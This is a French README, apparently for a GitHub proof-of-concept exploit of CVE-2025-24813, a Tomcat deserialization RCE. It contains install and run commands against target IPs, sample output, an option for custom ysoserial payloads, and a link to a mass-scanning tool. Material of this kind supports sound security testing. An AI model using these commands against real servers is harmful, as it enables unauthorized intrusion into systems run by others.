
Une preuve de concept d'exploit Python pour CVE-2025-24813 - RCE non authentifiée dans Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2) via désérialisation malveillante d'objets Java. Inclut un mode de détection sécurisé et la prise en charge de charges utiles personnalisées.
Un exploit de preuve de concept pour la vulnérabilité de désérialisation d'Apache Tomcat (CVE-2025-24813). Cet outil montre comment les attaquants pourraient exploiter une désérialisation non sécurisée dans la gestion des sessions de Tomcat.
AVERTISSEMENT : Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins éducatives. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas est illégale.
requestscoloramagit clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
Utilisation de base :
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
Options avancées :
python CVE-2025-24813-PoC.py \
-t 10.0.0.1 \
-p 8443 \
--protocol https \
--no-verify \
--timeout 15
| Argument | Description | Requis |
|---|---|---|
-t, --target | Adresse IP cible | Oui |
-p, --port | Numéro de port cible | Oui |
--protocol | http ou https (par défaut : http) | Non |
--no-verify | Désactiver la vérification du certificat SSL | Non |
--timeout | Délai d'attente de la requête en secondes (par défaut : 10) | Non |
[*] Apache Tomcat CVE-2025-24813 Exploit PoC
[!] WARNING: For authorized testing only. Unauthorized use is illegal.
[*] Targeting http://192.168.1.100:8080
[*] Payload Options:
1. Use default dummy payload (safe, for detection)
2. Enter custom payload (hex-encoded, e.g., from ysoserial)
[?] Enter choice (1 or 2): 1
[*] Using default dummy payload.
[*] Attempting exploit...
[+] Success: Deserialization triggered (HTTP 500). Potential RCE if payload is malicious!
Pour scanner en masse les systèmes vulnérables :
🔍 CVE-2025-24813-Scanner - Outil de détection en masse pour les hôtes Tomcat vulnérables
Si vous êtes concerné par cette vulnérabilité :
Ce logiciel est fourni sous la licence MIT. L'auteur n'est pas responsable de toute utilisation abusive de cet outil. Obtenez toujours une autorisation appropriée avant de tester des systèmes.
Licence MIT - Consultez le fichier LICENSE pour plus de détails.